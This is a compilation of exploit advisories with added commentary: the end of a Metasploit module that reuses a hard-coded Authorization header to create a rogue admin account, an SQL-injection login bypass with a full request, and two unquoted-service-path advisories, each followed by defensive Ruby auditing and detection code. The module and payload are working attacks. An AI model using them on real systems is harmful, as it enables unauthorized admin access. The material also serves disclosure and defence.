<br /> # Extract the value of an assignment of the form ["KEY"] = "VALUE" from app.js,<br /> # e.g. default.a.defaults.headers.post["Authorization"] = "Basic ...". Returns "" when absent.<br /> def split(data, string_to_split)<br /> data.scan(/"#{string_to_split}"\] = "([\S\s]*?)"/).flatten.first.to_s<br /> end<br /><br /> # Read the API base path (the axios baseURL) from app.js; it prefixes the users endpoint.<br /> def app_path<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),<br /> 'method' => 'GET'<br /> })<br /><br /> if res && res.code == 200 && res.body =~ /baseURL/<br /> base_url = res.body.scan(/baseURL: '\/([\S\s]*?)'/).flatten.first<br /> print_status("baseURL: #{base_url}")<br /> return base_url<br /> else<br /> fail_with(Failure::NotVulnerable, 'baseURL not found!')<br /> end<br /> end<br /><br /> def add_user<br /> token = auth_bypass<br /> fail_with(Failure::NotVulnerable, 'Default Authorization header not found in app.js.') if token.nil?<br /> newuser = Rex::Text.rand_text_alpha_lower(8)<br /> id = Rex::Text.rand_text_numeric(4)<br /> # The password field carries the stored (encrypted) form taken from the original PoC;<br /> # hxZ8I33nmy9PZNhYhms/Dg== corresponds to the cleartext password 1111111111.<br /> json_data = '{"alarm_request": 1, "city_id": null, "city_name": null, "decryptPassword": null, "email": "' + newuser + '@localhost.local", "id": ' + id + ', "invisible": 0, "isactive": 1, "isblocked": 0, "levelstatus": 1, "local_authorization": 1, "mail_request": 1, "name": "' + newuser + '", "password": "hxZ8I33nmy9PZNhYhms/Dg==", "phone": null, "position": null, "region_name": "test4", "regional_id": 0, "role_id": 1, "role_name": "Sistem Admin", "rolelevel": 3, "status": null, "surname": "' + newuser + '", "totalRecords": null, "try_pass_right": 0, "userip": null, "username": "' + newuser + '", "userType": "Lokal Kullanıcı"}'<br /><br /> res = send_request_cgi(<br /> {<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'uri' => normalize_uri(target_uri.path, app_path, 'users'),<br /> 'headers' =><br /> {<br /> 'Authorization' => token<br /> },<br /> 'data' => json_data<br /> })<br /><br /> if res && res.code == 200 && res.body =~ /localhost/<br /> print_good("The sysAdmin authorized user has been successfully added.")<br /> print_status("Username: #{newuser}")<br /> print_status("Password: 1111111111")<br /> else<br /> fail_with(Failure::UnexpectedReply, 'An error occurred while adding the user. Try again.')<br /> end<br /> end<br />
<br /> # Fetch app.js and return the hard-coded default Authorization header, or nil when the<br /> # bundle does not set default.a.defaults.headers.post["Authorization"].<br /> def auth_bypass<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'js', 'app.js'),<br /> 'method' => 'GET'<br /> })<br /><br /> return nil unless res && res.code == 200 && res.body =~ /default.a.defaults.headers.post/<br /> token = split(res.body, 'Authorization')<br /> return nil if token.empty?<br /> print_status("Authorization: #{token}")<br /> token<br /> end<br /><br /> # check must report Safe rather than raise, so auth_bypass returns nil instead of calling fail_with.<br /> def check<br /> token = auth_bypass<br /> if token && token =~ /Basic/<br /> Exploit::CheckCode::Vulnerable<br /> else<br /> Exploit::CheckCode::Safe<br /> end<br /> end<br /><br /> def run<br /> unless check == Exploit::CheckCode::Vulnerable<br /> fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')<br /> end<br /> add_user<br /> end<br />end<br /></code></pre>
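The bypass above rests on a secret shipped in a public client-side bundle. The following is an added example, not code from the Metasploit module or from Servisnet: it extracts a hard-coded default Authorization header and API base path from a JavaScript bundle the way the module's split and app_path helpers do, and additionally decodes Basic credentials so the finding can be triaged (the module itself only replays the header verbatim). The bundle text, the /api-service path, the header value and the helper names are all made up for this example.

```ruby
# Added example: audit a JavaScript bundle for a hard-coded default
# Authorization header, as the module above does against js/app.js.
# Everything below is illustrative; nothing here is vendor code.

# Constructed sample of an axios-style bundle. The base path and the
# Basic credentials are made up for this demonstration.
SAMPLE_APP_JS = <<~'JS'
  var api = r.a.create({baseURL: '/api-service', timeout: 3e4});
  default.a.defaults.headers.post["Content-Type"] = "application/json";
  default.a.defaults.headers.post["Authorization"] = "Basic c3ZjLWFjY291bnQ6RXhhbXBsZVBhc3MxMjM=";
JS

# Value of an assignment of the form obj["KEY"] = "VALUE", or nil.
def bundle_assignment(js, key)
  m = js.match(/"#{Regexp.escape(key)}"\]\s*=\s*"([^"]*)"/)
  m && m[1]
end

# The axios baseURL with its leading slash stripped, or nil.
def bundle_base_url(js)
  m = js.match(/baseURL:\s*'\/([^']*)'/)
  m && m[1]
end

# [user, password] from a "Basic BASE64" header; nil for other schemes
# or for a value that is not valid base64.
def decode_basic(header)
  return nil unless header && header.start_with?('Basic ')
  decoded = header.split(' ', 2)[1].unpack1('m0')   # strict base64 decode
  decoded.split(':', 2)
rescue ArgumentError
  nil
end

# What an unauthenticated reader of the bundle learns.
def audit_bundle(js)
  header = bundle_assignment(js, 'Authorization')
  {
    base_url: bundle_base_url(js),
    authorization: header,
    scheme: header && header.split(' ', 2)[0],
    credentials: decode_basic(header),
  }
end

if __FILE__ == $PROGRAM_NAME
  report = audit_bundle(SAMPLE_APP_JS)
  puts "API base path : /#{report[:base_url]}"
  puts "Default header: #{report[:authorization]}"
  puts "Decoded creds : #{report[:credentials].inspect}" if report[:credentials]
end
```

Run it against a real bundle by replacing SAMPLE_APP_JS with the downloaded file contents; any non-nil authorization value is a finding regardless of whether the scheme decodes, since the server accepts the header as-is.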
<pre><code># Exploit Title: Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass<br /># Date: 01-12-2021<br /># Exploit Author: Mohamed habib Smidi (Craniums)<br /># Vendor Homepage: https://www.sourcecodester.com/php/15067/online-pre-ownedused-car-showroom-management-system-php-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/used_car_showroom.zip<br /># Version: 1.0<br /># Tested on: Ubuntu<br /><br /># Description :<br /><br />Admin panel authentication can be bypassed due to a SQL injection vulnerability in the login form: the username parameter reaches the login query unsanitized, so the payload below closes the string literal, appends the tautology or 1=1, limits the result to the first account and comments out the remainder of the query.<br /><br /># Request :<br /><br />POST /used_car_showroom/classes/Login.php?f=login HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 49<br />Origin: http://localhost<br />DNT: 1<br />Connection: close<br />Referer: http://localhost/used_car_showroom/admin/login.php<br />Cookie: PHPSESSID=v0h6049m9ppunsh8vtfc8oj4p5<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br /><br />username='+or+1%3D1+limit+1+--+-%2B&password=aaaa<br /><br /># URL-decoded username value: ' or 1=1 limit 1 -- -+<br /><br />--<br /></code></pre>
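The request above is the whole proof of concept, so a reviewer of web or proxy logs needs to recognise the same shape elsewhere. The following is an added example, not part of the advisory or of the application: it URL-decodes form bodies like the one above and flags the two indicators that distinguish this injection from a harmless apostrophe, a trailing SQL comment and a tautology. The request bodies other than the advisory's own payload, and the function names, are constructed for this example.

```ruby
# Added example: decode the login request body from the advisory and flag
# SQL-injection indicators in form bodies, e.g. while reviewing proxy or
# application logs for this authentication bypass. Not part of the advisory.
require 'uri'

# Constructed request bodies: the advisory's payload first, then a benign
# login, a different injection and a benign value containing an apostrophe.
SAMPLE_BODIES = [
  "username='+or+1%3D1+limit+1+--+-%2B&password=aaaa",
  "username=admin&password=Winter2021%21",
  "username=admin%27%23&password=x",
  "username=o%27brien&password=pa%24%24",
].freeze

# application/x-www-form-urlencoded body -> { name => value } ('+' becomes space).
def decode_form_body(body)
  URI.decode_www_form(body).to_h
end

# Indicators, strongest first. A lone quote is only noise on its own (think
# O'Brien); a trailing comment or a tautology is what turns it into an attack.
SQLI_PATTERNS = {
  comment:   /--\s|#|\/\*/,                        # "-- ", "#", "/*" cut the query short
  tautology: /\b(or|and)\s+('?\w+'?)\s*=\s*\2/i,    # or 1=1, or 'a'='a'
  quote:     /'/,                                   # closes the string literal
}.freeze

# { param => [indicators] } for every parameter that matched something.
def sqli_indicators(body)
  decode_form_body(body).each_with_object({}) do |(name, value), hits|
    found = SQLI_PATTERNS.select { |_, re| value.match?(re) }.keys
    hits[name] = found unless found.empty?
  end
end

# Alert only when a parameter carries a comment or tautology, not a bare quote.
def suspicious?(body)
  sqli_indicators(body).values.any? { |inds| (inds & [:comment, :tautology]).any? }
end

if __FILE__ == $PROGRAM_NAME
  SAMPLE_BODIES.each do |body|
    flag = suspicious?(body) ? 'ALERT' : 'ok   '
    puts "#{flag} #{decode_form_body(body)['username'].inspect} #{sqli_indicators(body)}"
  end
end
```

The quote-only case is kept separate on purpose: alerting on every apostrophe produces noise on legitimate names, while the comment and tautology indicators are what the advisory's payload actually needs to bypass the password check.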
<pre><code># Exploit Title: FLAME II MODEM USB - Unquoted Service Path<br /># Discovery by: Ismael Nava<br /># Discovery Date: 02-02-2022<br /># Vendor Homepage: https://www.telcel.com/personas/equipos/modems-usb/alcatel/x602a<br /># Software Links : N/A (it is a BAM, a mobile broadband USB modem)<br /># Tested Version: N/A<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Windows 10 64 BITS<br /><br /><br />C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """<br />FLAME II HSPA USB MODEM Service FLAME II HSPA USB MODEM Service C:\Program Files (x86)\Internet Telcel\ApplicationController.exe Auto<br /><br />C:\>sc qc "FLAME II HSPA USB MODEM Service"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: FLAME II HSPA USB MODEM Service<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\Internet Telcel\ApplicationController.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : FLAME II HSPA USB MODEM Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/1d622f8c72b010b8d7213c032db122e4.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Win32.Mucc.ivk<br />Vulnerability: Insecure Service Path<br />Description: The malware creates a service with an unquoted path. Third-party attackers who can place an arbitrary executable in the root of the C:\ drive (as C:\Program.exe) can potentially undermine the integrity of the malware by having the service run theirs instead, with SYSTEM privileges.<br />Type: PE32<br />MD5: 1d622f8c72b010b8d7213c032db122e4<br />Vuln ID: MVID-2021-0412<br />Disclosure: 12/03/2021<br /><br /><br />Exploit/PoC:<br />C:\Program Files (x86)\SQLIOSIMS\SQLIOSIMS.exe<br /><br />C:\>sc qc "SQLAGENT MSSQL SQLIOSIMS"<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: SQLAGENT MSSQL SQLIOSIMS<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : C:\Program Files (x86)\SQLIOSIMS\SQLIOSIMS.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : MSSQLSERVER SQLIOSIMS<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
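Both the FLAME II modem advisory and the Trojan.Win32.Mucc.ivk advisory above show the same condition: an auto-start LocalSystem service whose BINARY_PATH_NAME contains spaces and no quotes. What neither listing spells out is which file names Windows will try first. The following is an added example, not code from either advisory: it parses an sc qc listing and enumerates the executables CreateProcess would attempt before the real one, plus the directory an attacker would need write access to for each. The sc output is constructed on the layout of the listings above (with the SQLIOSIMS values), and the function names are this example's own.

```ruby
# Added example: parse `sc qc` output and enumerate the executables Windows
# would try before the intended one when the service path is unquoted.
# Not code from either advisory; the sample output is constructed on the
# layout both advisories show.

# Constructed `sc qc` listing (English field names) modelled on the
# SQLIOSIMS service above.
SAMPLE_SC_QC = <<~'TXT'
  [SC] QueryServiceConfig SUCCESS

  SERVICE_NAME: SQLAGENT MSSQL SQLIOSIMS
          TYPE               : 110  WIN32_OWN_PROCESS (interactive)
          START_TYPE         : 2   AUTO_START
          ERROR_CONTROL      : 0   IGNORE
          BINARY_PATH_NAME   : C:\Program Files (x86)\SQLIOSIMS\SQLIOSIMS.exe
          LOAD_ORDER_GROUP   :
          TAG                : 0
          DISPLAY_NAME       : MSSQLSERVER SQLIOSIMS
          DEPENDENCIES       :
          SERVICE_START_NAME : LocalSystem
TXT

# "FIELD : value" lines -> { 'FIELD' => 'value' }. Splits at the first colon,
# so the drive-letter colon inside a path is left alone.
def parse_sc_qc(output)
  output.each_line.each_with_object({}) do |line, fields|
    key, sep, value = line.strip.partition(':')
    key = key.strip
    next if sep.empty? || key !~ /\A[A-Z_]+\z/
    fields[key] = value.strip
  end
end

# When the image path is unquoted, CreateProcess tries every space-delimited
# prefix with ".exe" appended, left to right, before the full path.
def hijack_candidates(path)
  return [] if path.start_with?('"')   # quoted paths are not affected
  parts = path.split(' ')
  return [] if parts.size < 2          # no spaces, nothing to hijack
  (1...parts.size).map { |i| parts[0, i].join(' ') + '.exe' }
end

# Directory an attacker must be able to write to in order to plant a candidate.
def write_target(candidate)
  dir = candidate.rpartition('\\')[0]
  dir.end_with?(':') ? dir + '\\' : dir
end

# One-shot assessment of a single service from its `sc qc` output.
def unquoted_service_report(sc_output)
  cfg = parse_sc_qc(sc_output)
  candidates = hijack_candidates(cfg['BINARY_PATH_NAME'].to_s)
  {
    name: cfg['SERVICE_NAME'],
    account: cfg['SERVICE_START_NAME'],
    auto_start: cfg['START_TYPE'].to_s.include?('AUTO_START'),
    candidates: candidates,
    write_targets: candidates.map { |c| write_target(c) }.uniq,
  }
end

if __FILE__ == $PROGRAM_NAME
  r = unquoted_service_report(SAMPLE_SC_QC)
  puts "#{r[:name]} runs as #{r[:account]} (auto-start: #{r[:auto_start]})"
  r[:candidates].each { |c| puts "  would run #{c} if it existed" }
  puts "  writable location needed: #{r[:write_targets].join(', ')}"
end
```

For the modem service above the same function yields C:\Program.exe, C:\Program Files.exe and C:\Program Files (x86)\Internet.exe; the last of these sits under Program Files (x86), so the finding is only exploitable by a standard user if that directory's ACL is unusually permissive, which is the check to make before calling it a privilege escalation.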